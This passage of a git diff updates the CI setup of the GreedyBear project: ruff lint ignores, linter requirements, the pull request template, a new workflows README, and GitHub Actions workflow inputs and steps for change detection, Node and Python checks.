+    # DJ008: Allow models without __str__ (legacy models, API-only)
+    "DJ008",
+    # DJ012: Allow existing Django model field ordering
+    "DJ012",
+    # E501: Allow long lines in docstrings
+    "E501",
+    # N801/N802/N803: Allow existing naming conventions (viewType, iocType, X for ML, migration functions)
+    "N801",
+    "N802",
+    "N803",
+    # N804: Allow 'self' in class methods for Django test compatibility
+    "N804",
+    # N806: Allow uppercase variable names for ML conventions (X_train, X_test)
+    "N806",
+    # N818: Allow existing exception naming
+    "N818",
+    # UP008: Allow explicit super() in tests for clarity
+    "UP008",
+    # UP031: Allow old-style % formatting in tests
+    "UP031",
+]
diff --git a/.github/configurations/python_linters/requirements-linters.txt b/.github/configurations/python_linters/requirements-linters.txt
index 8b8a8a20..8110ca60 100644
--- a/.github/configurations/python_linters/requirements-linters.txt
+++ b/.github/configurations/python_linters/requirements-linters.txt
@@ -1,6 +1,13 @@
-black==24.8.0
+autoflake~=2.3.1
+bandit~=1.8.3
+black~=25.1.0
 # use fork since main repo is not updated
 # see https://github.com/rocioar/flake8-django/pull/134
+# Note: python 3.12 is not supported
 flake8-django @ git+https://github.com/terencehonles/flake8-django.git@a6e369e89d275dfd5514f2aa9d091aa36c5ff84b
-flake8==7.1.1
-isort==5.13.2
\ No newline at end of file
+flake8~=7.1.2
+isort~=6.0.1
+pylint-django~=2.6.1
+pylint~=3.3.5
+ruff~=0.12.7
+
diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
index c075a634..3b93c450 100644
--- a/.github/pull_request_template.md
+++ b/.github/pull_request_template.md
@@ -20,7 +20,7 @@ Please delete options that are not relevant.
 - [ ] I have read and understood the rules about [how to Contribute](https://intelowlproject.github.io/docs/GreedyBear/Contribute/) to this project.
 - [ ] The pull request is for the branch `develop`.
 - [ ] I have added documentation of the new features.
-- [ ] Linters (`Black`, `Flake`, `Isort`) gave 0 errors. If you have correctly installed [pre-commit](https://intelowlproject.github.io/docs/GreedyBear/Contribute/#how-to-start-setup-project-and-development-instance), it does these checks and adjustments on your behalf.
+- [ ] Linter (`Ruff`) gave 0 errors. If you have correctly installed [pre-commit](https://intelowlproject.github.io/docs/GreedyBear/Contribute/#how-to-start-setup-project-and-development-instance), it does these checks and adjustments on your behalf.
 - [ ] I have added tests for the feature/bug I solved. All the tests (new and old ones) gave 0 errors.
 - [ ] If changes were made to an existing model/serializer/view, the docs were updated and regenerated (check [CONTRIBUTE.md](https://github.com/intelowlproject/docs/blob/main/docs/GreedyBear/Contribute.md)).
 - [ ] If the GUI has been modified:
diff --git a/.github/workflows/README.md b/.github/workflows/README.md
new file mode 100644
index 00000000..258d5a1d
--- /dev/null
+++ b/.github/workflows/README.md
@@ -0,0 +1,217 @@
+# Worflows
+
+## [Reusable detect changes workflow](_detect_changes.yml)
+
+This sub workflow detects and enumerates the changes between two branches.
+
+It is composed of five steps:
+
+1. **Check out PR target branch** - This step checks out the latest commit of the PR target branch for the current repository. This workflow was designed to detect changes when a PR to a target branch was created. Therefore, the latest commit of the target branch must be checked out as the first step. To achieve this, GitHub's [**checkout**](https://github.com/actions/checkout) action is used with the following parameters:
+   1. **ref** - The branch, tag or SHA to checkout - It is set to `github.base_ref`, which corresponds to the **PR target branch**.
+2. **Check out source branch latest commit** - This step checks out the latest commit of the source branch on top of the previous one. To do so, GitHub's [**checkout**](https://github.com/actions/checkout) action is used with the following parameters:
+   1. **clean** - Whether to execute `git clean -ffdx && git reset --hard HEAD` before fetching - It is set to false, which means **do not delete untracked files**.
+3. **Generate summary** - This step creates the title for the action summary. As a matter of fact, the detected changes will be reported below the title in the summary section. The step is performed only if one or both *backend_directories* and *frontend_directories* inputs are not empty.
+4. **Generate diffs for backend** - This step detects and enumerates the files that changed between the two branches. This is performed using [`git diff`](https://git-scm.com/docs/git-diff) command. Specifically, the code instructs git to show the changes in the *backend_directories* relative to `origin/<github.base_ref>` (the target branch). During this process, the [**pathspec**](https://git-scm.com/docs/gitglossary#Documentation/gitglossary.txt-aiddefpathspecapathspec) is used to exclude files or directories specified in the *backend_exclusions* input. The changes are then enumerated and output through the *backend* variable.
+5. **Generate diffs for frontend** - This step follow the same pattern as the **Generate diffs for backend** step but for the frontend directories.
+
+### Documentation
+
+#### Inputs
+
+* **backend_directories** - Optional - Space separated list of backend directories to check for changes. By default, it is set to an empty string.
+* **backend_exclusions** - Optional - Space separated list of backend files or directories to **exclude** when checking for changes. Globs are supported. By default, it is set to an empty string.
+* **frontend_directories** - Optional - Space separated list of frontend directories to check for changes. By default, it is set to an empty string
+* **frontend_exclusions** - Optional - Space separated list of frontend files or directories to **exclude** when checking for changes. Globs are supported. By default, it is set to an empty string.
+* **ubuntu_version** - Optional - The Ubuntu version to run the workflow against. By default, it is set to `latest`.
+
+#### Outputs
+
+* **backend** - The number of backend files that have changed.
+* **frontend** - The number of frontend files that have changed.
+
+## [Reusable node tests workflow](_node.yml)
+
+This sub workflow install node dependencies and run frontend linters and tests.
+
+It is composed of nine steps:
+
+1. **Check out latest commit for current branch** - This step checks out the latest commit for the current branch of the repository. To do so, it uses GitHub's [**checkout**](https://github.com/actions/checkout) action with no parameters.
+2. **Set up Node.js** - This step sets Node.js up downloading binaries and project's dependencies. This is done using the GitHub's [**setup-node**](https://github.com/actions/setup-node) action which also allows to cache and restore the project dependencies. It's used with the following parameters:
+   1. **node-version** - Node.js version to use - It is set according to *node_version* input variable.
+   2. **cache** - Which package manager used to install and cache packages - It is set to `npm`.
+   3. **cache-dependency-path** - Path to the dependency file: `package-lock.json`, `yarn.lock` etc. It is set to `<working_directory>/package-lock.json`, where *working_directory* is the input variable.
+3. **Add dependencies** - This step adds additional dependencies to the `package-lock.json` file. Specifically, these packages are added to the **devDependencies** part of the aforementioned file. Which packages will be added is chosen accordingly to input variables:
+   1. *use_jest*
+   2. *use_react*
+   3. *use_eslint*
+   4. *use_prettier*
+   5. *use_stylelint*
+4. **Install packages** - This step install all missing packages from the dependency file in the directory specified by the *working_directory* input variable.
+5. **Run linters** - This step uses [**node_linter**](../actions/node_linter/action.yml) action to run linters against the frontend source code.
+6. **Check packages licenses** - This step uses [**pilosus/action-pip-license-checker**](https://github.com/pilosus/action-pip-license-checker) to check the licenses used by the project requirements.
+7. **Run CodeQL** - This step uses [**codeql**](../actions/codeql/action.yml) action to run CodeQL to discover vulnerabilities across the codebase.
+8. **Run custom command** - This step is performed only if the input variable *custom_command* is not empty. The step simply run the bash command described in the previously mentioned input variable in the working directory specified by the *working_directory* input variable.
+9. **Run jest tests** - This step runs Jest tests if the input variable *use_jest* is set to true. Finally, if *use_coverage* and *upload_coverage* are set to true, a coverage report is generated and uploaded.
+
+### Documentation
+
+#### Inputs
+
+* **node_versions** - Required - An array of Node.js versions to use.
+* **working_directory** - Required - Path to the `package.json` file
+* **check_packages_licenses** - Optional - Whether to check npm packages licenses or not. By default it is set to true.
+* **use_jest** - Optional - Whether to use Jest test suite or not. By default it is set to false.
+* **use_react** - Optional - Whether react is used by the project or not. By default it is set to false.
+* **use_eslint** - Optional - Whether to use ESlint linter or not. By default it is set to true
+* **use_prettier** - Optional - Whether to use Prettier formatter or not. By default it is set to true.
+* **use_stylelint** - Optional - Whether to use Stylelint linter or not. By default it is set to true.
+* **use_coverage** - Optional - Whether to use Coverage or not. To work, it also require *use_jest* to be true. By default it is set to false.
+* **upload_coverage** - Optional - Whether to upload coverage report to GitHub. By default it is set to false
+* **run_codeql** - Optional - Whether to run CodeQL against the codebase. By default it is set to false.
+* **custom_command** - Optional - A custom bash command to be run by the workflow. By default it is set to an empty string.
+* **max_timeout** - Optional - A maximum amount of minutes allowed for the workflow to run. By default it is set to 30.
+* **ubuntu_version** - Optional - The Ubuntu version to run the workflow against. By default it is set to `latest`.
+
+## [Reusable python linter workflow](_python.yml)
+
+This sub workflow runs Python linters and tests against the codebase.
+
+It is composed of one job:
+
+1. **python** - This job is composed of thirty-one steps:
+   1. **Check out latest commit** - Checks out the latest commit on the current branch of the repository using the GitHub's [**checkout**](https://github.com/actions/checkout) action.
+   2. **Set up Python** - Sets up Python on the runner machine using GitHub's [**setup-python**](https://github.com/actions/setup-python) action with the following parameter:
+      1. **python-version** - Which Python version to use - It is set according to the *python_versions* input variable.
+   3. **Inject stuff to environment** - This step adds a few environment variables to the system's environment. Specifically:
+      1. If *django_settings_module* is set, **PYTHONPATH** and **DJANGO_SETTINGS_MODULE** will be added to the runner's environment.
+      2. If *run_codeql* is true, **CODEQL_PYTHON** will be added to the runner's environment.
+   4. **Restore APT cache related to PR event** - This step will try to restore the APT cache related to the PR event using [**restore_apt_cache**](../actions/apt_requirements/restore_apt_cache/README.md) with the following parameter:
+      1. **apt_requirements_file_path** - Path to the APT requirements file - It is set to the *packages_path* input variable.
+   5. **Restore APT cache related to target branch** - This step will try to restore the APT cache related related to the target branch (of the PR) using [**restore_apt_cache**](../actions/apt_requirements/restore_apt_cache/README.md) only if **Restore APT cache related to PR event** produces a cache miss. It is run with the following parameter:
+      1. **apt_requirements_file_path** - Path to the APT requirements file - It is set to the *packages_path* input variable.
+      2. **git_reference** - A git reference (name of the branch, reference to the PR) that will be used to build the cache key - It is set to the target branch.
+   6. **Restore APT repositories** - If both PR event and target branch APT cache restore attempt resulted in a cache miss, the APT repositories list is refreshed using `sudo apt-get update`.
+   7. **Install APT requirements** - This step installs APT requirements listed in the *packages_path* requirements file. **Since they are not required, recommended packages are not downloaded**.
+   8. **Save APT cache related to PR event** - When the attempt to restore the APT cache related to the PR event results in a cache miss, the newly populated APT cache is saved to GitHub. This is performed using [**save_apt_cache**](../actions/apt_requirements/save_apt_cache/README.md) action with the following parameter:
+      1. **apt_requirements_file_path** - Path to the APT requirements file - It is se to the *packages_path* input variable.
+   9. **Create linter requirements file** - This step creates the linter requirements file using the [**create_linter_requirements_file**](../actions/python_requirements/create_linter_requirements_file/README.md) action.
+   10. **Create dev requirements file** - This step creates the development requirements file using the [**create_dev_requirements_file**](../actions/python_requirements/create_dev_requirements_file/README.md) action.
+   11. **Create docs requirement file** - This step creates the documentation requirements file using the [**create_docs_requirements_file**](../actions/python_requirements/create_docs_requirements_file/README.md) action.
+   12. **Restore Python virtual environment related to PR event** - This step attempts to restore the Python virtual environment for the PR using the [**restore_python_virtualenv**](../actions/python_requirements/restore_virtualenv/README.md) action.
+   13. **Restore Python virtual environment related to target branch** - If the attempt to restore the Python virtual environment for the PR, result in a cache miss, an attempt to restore the Python virtual environment for the target branch is made using the [**restore_python_virtualenv**](../actions/python_requirements/restore_virtualenv/README.md) action.
+   14. **Create Python virtual environment** - If both attempts to restore the Python virtual environment for the PR, for the target branch, result in a cache miss, a Python virtual environment is created using the [**create_virtualenv**](../actions/python_requirements/create_virtualenv/README.md) action.
+   15. **Restore pip cache related to PR event** - If both attempts to restore the Python virtual environment for the PR, for the target branch, result in a cache miss, an attempt to restore the pip cache for the PR event is made using the [**restore_pip_cache**](../actions/python_requirements/restore_pip_cache/README.md) action.
+   16. **Restore pip cache related to target branch** - If both attempts to restore the Python virtual environment for the PR, for the target branch, as well as the pip cache for the PR, result in a cache miss, an attempt to restore the pip cache for the target branch is made using the [**restore_pip_cache**](../actions/python_requirements/restore_pip_cache/README.md) action.
+   17. **Install project requirements** - If both attempts to restore the Python virtual environment for the PR event, and the target branch result in a cache miss, project requirements are installed from the working directory specified by the *install_from* input variable.
+   18. **Install other requirements** - If the attempt to restore the Python virtual environment for the PR event result in a cache miss, developer, linters and documentation requirements are installed from the working directory specified by *working_directory* input variable.
+   19. **Check requirements licenses** - If the input variable *check_requirements_licenses* is set to true and the attempt to restore the Python virtual environment related to the PR event result in a cache miss, this step performs the requirements licenses check using [**pilosus/action-pip-license-checker**](https://github.com/pilosus/action-pip-license-checker).
+   20. **Print wrong licenses** - If the output of **Check requirements licenses** is `failure`, the list of licenses for which the check failed will be returned.
+   21. **Save Python virtual environment related to PR event** - If the attempt to restore the Python virtual environment resulted in a cache miss, the Python virtual environment is saved for the PR event using the [*save_virtualenv*](../actions/python_requirements/save_virtualenv/README.md) action with the following parameter:
+       1. **requirements_paths** - A space separated list of requirements file paths - It is set to the combination of *requirements_path*, `requirements-linters.txt`, `requirements-dev.txt` and `requirements-docs.txt` joined by spaces.
+   22. **Save pip cache related to PR event** - If both attempts to restore the Python virtual environment and the pip cache related to the PR resulted in a cache miss, the pip cache is saved for the PR event using the [*save_pip_cache*](../actions/python_requirements/save_pip_cache/README.md) action.
+   23. **Run linters** - If one of the following input variables: *use_black*, *use_isort*, *use_flake8*, *use_pylint*, *use_bandit* and *use_autoflake* is true, this step executes the linters against the codebase in the working directory specified by the *working_directory* variable.
+   24. **Run CodeQL** - If the *run_codeql* input variable is true, this step runs CodeQL against the codebase using the [**codeql**](../actions/codeql/action.yml) action in the working directory specified by the *working_directory* variable.
+   25. **Build Docs** - If the *check_docs_directory* input variable is set, this step executes `rstcheck` to ensure that the documentation in *check_docs_directory* is valid. Finally, the documentation is built using `sphinx`.
+   26. **Start services** - If one or more of the following input variables: *use_postgres*, *use_elastic_search*, *use_memcached*, *use_redis*, *use_rabbitmq* and *use_mongo* are true, this step creates the Docker container for the service using the [**services**](../actions/services/action.yml) action. Additional parameters, such as *postgres_db* or *elasticsearch_version* can also be provided to the aforementioned action.
+   27. **Start celery worker** - If the *use_celery* input variable is true, a Celery worker is created for the *celery_app* application. The `celery` command is executed in the working directory specified by the *working_directory* input variable.
+   28. **Run custom command** - If the *custom_command* input variable is not empty, the command defined by the variable is executed in the working directory specified by the *working_directory* input variable.
+   29. **Check migrations** - If *check_migrations* is true and *django_settings_module* is not empty, this step will perform a dry run of `django-admin makemigrations` to ensure that the migrations are valid.
+   30. **Run unittest** - This step runs Python tests against the codebase in the directory described by the *working_directory* input variable. Additionally, according to *tags_for_manual_tests* and *tags_for_slow_tests* variables, some tests will be excluded from the run.
+   31. **Create coverage output** - If *use_coverage* and *upload_coverage* are set to true, this step produces a coverage report of the codebase and uploads it to GitHub. The *working_directory* input variable is used to determines the directory in which coverage should be run.
+
+### Documentation
+
+#### Inputs
+
+* **python_versions** - Required - Python versions used by this workflow in the form of a JSON array.
+* **ubuntu_version** - Optional - Ubuntu version to run workflow against. By default, it is set to `latest`.
+* **working_directory** - Required - Directory in which to run linters.
+* **requirements_path** - Required - Path to the requirements file of the Python project.
+* **install_from** - Optional - Directory where all installation commands will be run. By default, it is set to `.`.
+* **packages_path** - Optional - Path to the APT requirements file of the Python project. By default, it is set to an empty string.
+* **env** - Optional - A JSON object containing a set of environment variables to be added to the system's environment. By default, it is set to an empty JSON object `{}`.
+* **max_timeout** - Optional - Maximum amount of time (in minutes) the workflow is allowed to run. By default, it is set to `30`.
+* **use_black** - Optional - Whether to use black formatter. By default, it is set to `false`.
+* **use_isort** - Optional - Whether to use isort formatter. By default, it is set to `false`.
+* **use_ruff_formatter** - Optional - Whether to use ruff formatter. By default, it is set to `false`.
+* **use_autoflake** - Optional - Whether to use autoflake linter. By default, it is set to `false`.
+* **use_bandit** - Optional - Whether to use bandit linter. By default, it is set to `false`.
+* **use_flake8** - Optional - Whether to use flake8 linter. By default, it is set to `false`.
+* **use_pylint** - Optional - Whether to use pylint linter. By default, it is set to `false`.
+* **use_ruff_linter** - Optional - Whether to use ruff linter. By default, it is set to `false`.
+* **use_coverage** - Optional - Whether to use coverage. By default, it is set to `false`.
+* **coverage_config_path** - Optional - Path to the coverage configuration file. By default, it is set to `.coveragerc`.
+* **upload_coverage** - Optional - Whether to upload coverage report to GitHub. To work, it needs *use_coverage* to be true. By default, it is set to `false`.
+* **run_codeql** - Optional - Whether to run CodeQL against codebase. By default, it is set to `false`.
+* **use_celery** - Optional - Whether to create a Celery container. By default, it is set to `false`.
+* **use_elastic_search** - Optional - Whether to create an Elasticsearch container. By default, it is set to `false`.
+* **use_memcached** - Optional - Whether to create a Memcached container. By default, it is set to `false`.
+* **use_mongo** - Optional - Whether to create a MongoDB container. By default, it is set to `false`.
+* **use_postgres** - Optional - Whether to create a PostgresDB container. By default, it is set to `false`.
+* **use_rabbitmq** - Optional - Whether to create a RabbitMQ container. By default, it is set to `false`.
+* **use_redis** - Optional - Whether to create a Redis container. By default, it is set to `false`.
+* **celery_app** - Optional - A Celery application name. Requires *use_celery* to be true. By default, it is set to an empty string.
+* **celery_queues** - Optional - A comma separated list of Celery queues. Requires *use_celery* to be true. By default, it is set to `default`.
+* **elasticsearch_version** - Optional - Elasticsearch's container version. By default, it is set to `latest`.
+* **elasticsearch_port** - Optional - Elasticsearch's container exposed port. By default, it is set to `9200`.
+* **memcached_version** - Optional - Mecached's container version. By default, it is set to `latest`.
+* **mongo_version** - Optional - MongoDB's container version. By default, it is set to `latest`.
+* **postgres_db** - Optional - PostgresDB database name. Requires *use_postgres* to be true. By default, it is set to `db`.
+* **postgres_user** - Optional - PostgresDB user name. Requires *use_postgres* to be true. By default, it is set to `user`.
+* **postgres_password** - Optional - PostgresDB password. Requires *use_postgres* to be true. By default, it is set to `password`.
+* **postgres_version** - Optional - PostgresDB's container version. Requires *use_postgres* to be true. By default, it is set to `latest`.
+* **rabbitmq_version** - Optional - RabbitMQ's container version. Requires *use_rabbitmq* to be true. By default, it is set to `latest`.
+* **redis_version** - Optional - Redis' container version. Requires *use_redis* to be true. By default, it is set to `latest`.
+* **django_settings_module** - Optional - Path to the Django settings file. By default, it is set to an empty string.
+* **check_migrations** - Optional - Whether to check that the project's migrations are valid. Requires *django_settings_module* to be set. By default, it is set to `false`.
+* **check_requirements_licenses** - Optional - Whether to check that the requirements license is valid. Requires *django_settings_module* to be set. By default, it is set to `true`.
+* **ignore_requirements_licenses_regex** - Optional - A regex that describes which directories should be ignored when checking the validity of requirements licenses. By default, it is set to `uWSGI.*|lunardate.*|.*QuokkaClient.*|pyquokka.*`.
+* **tags_for_slow_tests** - Optional - A space separated list of tags for tests that will only be run on the master/main branch. **Works only for Django projects**. By default, it is set to an `slow`.
+* **tags_for_manual_tests** - Optional - A space separated list of tags for tests that will only be run **manually** (CI will ignore them). **Works only for Django projects**. By default, it is set to `manual`.
+* **custom_command** - Optional - A custom bash command to run. By default, it is set to an empty string.
+* **check_docs_directory** - Optional - Path to the documentation directory in which `rstcheck` will be run to check documentation files. By default, it is set to an empty string.
+* **check_dockerfile** - Optional - Path to a Dockerfile to be checked. **Warning: if set it may significantly increase the action time**. By default, it is set to an empty string.
+
+## [Create APT cache](create_apt_cache.yaml)
+
+This workflow is run in the event of **a push on branches *main*, *master*, *develop*, *dev***. Specifically, it is triggered only when the APT requirements file is updated.
+
+The workflow is composed of a single job:
+
+1. **Create cache for APT dependencies** - This job, as described by its name, creates a cache for APT dependencies and stores it on GitHub. It is composed of four steps:
+   1. **Check out latest commit on current branch** - This step checks out the latest commit on the current branch of the repository.
+   2. **Install APT dependencies** - This step refreshes APT repositories and then install the project dependecies. This action is required to produce the APT cache that will be saved later.
+   3. **Save APT cache** - This step saves APT cache on GitHub. The GitHub's [**save_apt_cache**](../actions/apt_requirements/save_apt_cache/README.md) action is used.
+
+## [Create Python cache](create_python_cache.yaml)
+
+This workflow is run in the event of **a push on branches *main*, *master*, *develop*, *dev***. Specifically, it is triggered only when the Python requirements file is updated.
+
+The workflow is composed of a single job:
+
+1. **Create cache for Python dependencies** - This job, as described by its name, creates a cache for Python dependencies and stores it on GitHub. It is composed of four steps:
+   1. **Check out latest commit** - This step checks out the latest commit on the current branch for the repository.
+   2. **Install system dependencies required by Python Packages** - **OPTIONAL** - Sometimes, Python packages require one or more system dependencies. For instance, `python-ldap` Python package requires `libldap2-dev` and `libsasl2-dev`, System dependencies, for a successful installation. This step allows user to install system dependencies required by Python packages.
+   3. **Set up Python** - This step install Python on the runner.
+   4. **Set up Python virtual environment** - This step uses [**create_virtualenv**](../actions/python_requirements/create_virtualenv/README.md) action to create a Python virtual environment.
+   5. **Install Python dependencies** - This step install Python requirements to produce the final virtual environment that will be cached. Also, installing the Python dependencies, creates the pip cache.
+   6. **Save pip cache** - This step uses [**save_pip_cache**](../actions/python_requirements/save_pip_cache/README.md) action to save pip's download cache on GitHub.
+   7. **Create virtual environment cache** - This step uses [**save_virtualenv**](../actions/python_requirements/save_virtualenv/README.md) action to save virtual environment on GitHub's cache.
+
+## [CI](pull_request_automation.yml)
+
+This workflow runs in the case of a **pull request on branches *master*, *main*, *develop*, *dev*** and it's the core CI workflow.
+
+It is composed of three jobs:
+
+1. **detect-changes** - This job detects and enumerates changes to backend and/or frontend files. To do so, it uses the [**_detect_changes**](_detect_changes.yml) workflow.
+2. **node** - If any changes to the frontend files are found, [**_node**](_node.yml) workflow is run.
+3. **python** - If any changes to the backend files are found, [**_python**](_python.yml) workflow is run.
+
+## [Release and publish](release.yml)
+
+TODO
+
+## [Reusable release and tag workflow](_release_and_tag.yml)
+
+TODO
diff --git a/.github/workflows/_detect_changes.yml b/.github/workflows/_detect_changes.yml
index efaffa05..9e9b8a65 100644
--- a/.github/workflows/_detect_changes.yml
+++ b/.github/workflows/_detect_changes.yml
@@ -3,16 +3,24 @@ on:
   workflow_call:
     inputs:
       backend_directories:
-        description: Backend directories separated by spaces
+        description: Space separated list of backend directories
+        required: false
+        type: string
+      
+      backend_exclusions:
+        description: Space separated list of Backend directories or files to be excluded
         required: false
         type: string
-        default: ''
 
       frontend_directories:
-        description: Frontend directories separated by spaces
+        description: Space separated list of frontend directories
+        required: false
+        type: string
+      
+      frontend_exclusions:
+        description: Space separated list of frontend directories or files to be excluded
         required: false
         type: string
-        default: ''
 
       ubuntu_version:
         description: Ubuntu version to use
@@ -37,13 +45,16 @@ jobs:
       backend: ${{steps.diff_check_backend.outputs.backend}}
       frontend: ${{steps.diff_check_frontend.outputs.frontend}}
     steps:
-    - uses: actions/checkout@v4
+    - name: Check out PR target branch
+      uses: actions/checkout@v4
       with:
         ref: ${{ github.base_ref }}
 
-    - uses: actions/checkout@v4
+    - name: Check out source branch latest commit
+      uses: actions/checkout@v4
       with:
         clean: false
+
     - name: Generate summary
       if: ${{inputs.backend_directories != ''}} | ${{inputs.frontend_directories != ''}}
       run: |
@@ -54,18 +65,34 @@ jobs:
       if: ${{inputs.backend_directories != ''}}
       id: diff_check_backend
       run: |
-        BACKEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} | head -n -1 | wc -l)
+        BACKEND_EXCLUSIONS=""
+        if ${{ inputs.backend_exclusions != ''}}; then
+          for exclusion in ${{ inputs.backend_exclusions }}; do
+            BACKEND_EXCLUSIONS+=":(glob,exclude)$exclusion "
+          done
+        fi
+        # No need to add other quotes since they will already be added.
+        BACKEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $BACKEND_EXCLUSIONS | head -n -1 | wc -l)
         echo "backend=$BACKEND_CHANGES" >> $GITHUB_OUTPUT
         echo "Backend Changes: $BACKEND_CHANGES" >> $GITHUB_STEP_SUMMARY
+        echo "::debug::diff command:git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $BACKEND_EXCLUSIONS"
+        echo "::debug::diff command results: $(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $BACKEND_EXCLUSIONS | head -n -1 )"
         echo "backend $BACKEND_CHANGES"
 
-
     - name: Generate diffs for frontend
       if: ${{inputs.frontend_directories != ''}}
       id: diff_check_frontend
       run: |
-        FRONTEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.frontend_directories }} | head -n -1 | wc -l)
+        FRONTEND_EXCLUSIONS=""
+        if ${{ inputs.frontend_exclusions != ''}}; then
+          for exclusion in ${{ inputs.frontend_exclusions }}; do
+            FRONTEND_EXCLUSIONS+=":(glob,exclude)$exclusion "
+          done
+        fi
+        FRONTEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.frontend_directories }} $FRONTEND_EXCLUSIONS | head -n -1 | wc -l)
         echo "frontend=$FRONTEND_CHANGES" >> $GITHUB_OUTPUT
         echo "Frontend Changes: $FRONTEND_CHANGES" >> $GITHUB_STEP_SUMMARY
+        echo "::debug::diff command:git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $FRONTEND_EXCLUSIONS"
+        echo "::debug::diff command results: $(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $FRONTEND_EXCLUSIONS | head -n -1 )"
         echo "frontend $FRONTEND_CHANGES"
 
diff --git a/.github/workflows/_node.yml b/.github/workflows/_node.yml
index 97d8980d..074bbe15 100644
--- a/.github/workflows/_node.yml
+++ b/.github/workflows/_node.yml
@@ -88,7 +88,8 @@ jobs:
         node_version: ${{ fromJson(inputs.node_versions) }}
         language: ['javascript']
     steps:
-      - uses: actions/checkout@v4
+      - name: Check out latest commit for current branch
+        uses: actions/checkout@v4
 
       - name: Set up Node.js
         uses: actions/setup-node@v4
@@ -102,7 +103,7 @@ jobs:
           if [[ '${{ inputs.use_jest }}' != 'false' ]]; then
             npm i -D --package-lock-only jest @testing-library/jest-dom babel-jest @babel/core @babel/preset-env
             if [[ '${{ inputs.use_react }}' != 'false' ]]; then
-              npm i -D --package-lock-only  @testing-library/react @testing-library/jest-dom
+              npm i -D --package-lock-only  @testing-library/react
             fi
           fi
           if [[ '${{ inputs.use_eslint }}' != 'false' ]]; then
@@ -124,10 +125,10 @@ jobs:
         uses: ./.github/actions/node_linter
         with:
           working_directory: ${{ inputs.working_directory }}
-          use_eslint: ${{ inputs.use_eslint == true }}
-          use_prettier: ${{ inputs.use_prettier == true }}
-          use_stylelint: ${{ inputs.use_stylelint == true }}
-          check_packages_licenses: ${{ inputs.check_packages_licenses == true }}
+          use_eslint: ${{ inputs.use_eslint }}
+          use_prettier: ${{ inputs.use_prettier }}
+          use_stylelint: ${{ inputs.use_stylelint }}
+          check_packages_licenses: ${{ inputs.check_packages_licenses }}
 
       - name: Check packages licenses
         if: ${{ inputs.check_packages_licenses }}
@@ -138,7 +139,7 @@ jobs:
           requirements: ${{ inputs.requirements_path }}
           external: ${{ inputs.working_directory }}/licenses.csv
           external-format: csv
-          table-headers: true
+          headers: true
           fail: 'StrongCopyleft,NetworkCopyleft,Error'
           fails-only: true
 
diff --git a/.github/workflows/_python.yml b/.github/workflows/_python.yml
index d24cd1b4..8c5c39f4 100644
--- a/.github/workflows/_python.yml
+++ b/.github/workflows/_python.yml
@@ -2,168 +2,167 @@ name: Reusable python linter workflow
 on:
   workflow_call:
     inputs:
+      # Base configs
       python_versions:
-        description: Python versions to use
+        description: Python versions to use (in the form of a JSON array)
         type: string
         required: true
+      ubuntu_version:
+        description: Ubuntu version to use
+        type: string
+        default: latest
+        required: false
       working_directory:
         description: Directory that must be run against the linters
         type: string
         required: true
-
-      use_autoflake:
-        description: Use autoflake linter
-        default: false
-        type: boolean
+      requirements_path:
+        description: Path to the requirements.txt file
+        type: string
+        required: true
+      install_from:
+        description: Directory that must be used to install the packages
+        type: string
         required: false
+        default: .
+      packages_path:
+        description: Path to the packages.txt file (APT requirements)
+        type: string
+        required: false
+      env:
+        description: Environment variables to set
+        type: string
+        required: false
+        default: >-
+          {}
+      max_timeout:
+        description: Max time that the CI can be run
+        type: number
+        required: false
+        default: 30
+
+      # Formatters
       use_black:
         description: Use black formatter
-        default: false
         type: boolean
         required: false
       use_isort:
         description: Use isort formatter
-        default: false
         type: boolean
         required: false
-      use_flake8:
-        description: Use flake8 linter
-        default: false
+      use_ruff_formatter:
+        description: Use ruff formatter
         type: boolean
         required: false
-      use_pylint:
-        description: Use pylint linter
-        default: false
+
+      # Linters
+      use_autoflake:
+        description: Use autoflake linter
         type: boolean
         required: false
       use_bandit:
         description: Use bandit linter
-        default: false
         type: boolean
         required: false
-
-      run_codeql:
-        description: Run codeql
-        default: false
+      use_flake8:
+        description: Use flake8 linter
         type: boolean
         required: false
-
-      requirements_path:
-        description: Path to the requirements.txt file
-        type: string
-        required: true
-
-      install_from:
-        description: Directory that must be used to install the packages
-        type: string
+      use_pylint:
+        description: Use pylint linter
+        type: boolean
         required: false
-        default: .
-
-      packages_path:
-        description: Path to the packages.txt file
-        type: string
+      use_ruff_linter:
+        description: Use ruff linter
+        type: boolean
         required: false
 
-      custom_command:
-        description: String of custom command to run
-        type: string
+      # Coverage configs
+      use_coverage:
+        description: Use coverage.py.
+        type: boolean
         required: false
-      django_settings_module:
-        description: Path to the django settings file
+      coverage_config_path:
+        description: Path to the coverage.py config file
         type: string
         required: false
-        default: ''
-
-      check_migrations:
-        description: Check if migrations are valid. Require django_settings_module to be set.
-        type: boolean
-        required: false
-        default: false
-      check_requirements_licenses:
-        description: Check if requirements have a valid license. Require django_settings_module to be set.
+        default: .coveragerc
+      upload_coverage:
+        description: Upload coverage.py report to github
         type: boolean
         required: false
-        default: true
-      ignore_requirements_licenses_regex:
-        description: Regex of repositories of which ignore license
-        type: string
-        required: false
-        default: uWSGI.*|lunardate.*|.*QuokkaClient.*|pyquokka.*
 
-      check_docs_directory:
-        description: Check docs using rstcheck inside this directory
-        type: string
-        required: false
-        default: ''
-      check_dockerfile:
-        description: Check dockerfile build. WARNING action total time may increase significantly
-        type: string
+      # CodeQL configs
+      run_codeql:
+        description: Run codeql
+        type: boolean
         required: false
-        default: ''
-
-      use_postgres:
-        description: Use postgres service
-        default: false
+      
+      # Services
+      use_celery:
+        description: Create a celery worker
         type: boolean
         required: false
       use_elastic_search:
         description: Use elastic_search service
-        default: false
         type: boolean
         required: false
       use_memcached:
         description: Use memcached service
-        default: false
         type: boolean
         required: false
-      use_redis:
-        description: Use redis service
-        default: false
+      use_mongo:
+        description: Use mongo service
         type: boolean
         required: false
-      use_rabbitmq:
-        description: Use rabbitmq service
-        default: false
+      use_postgres:
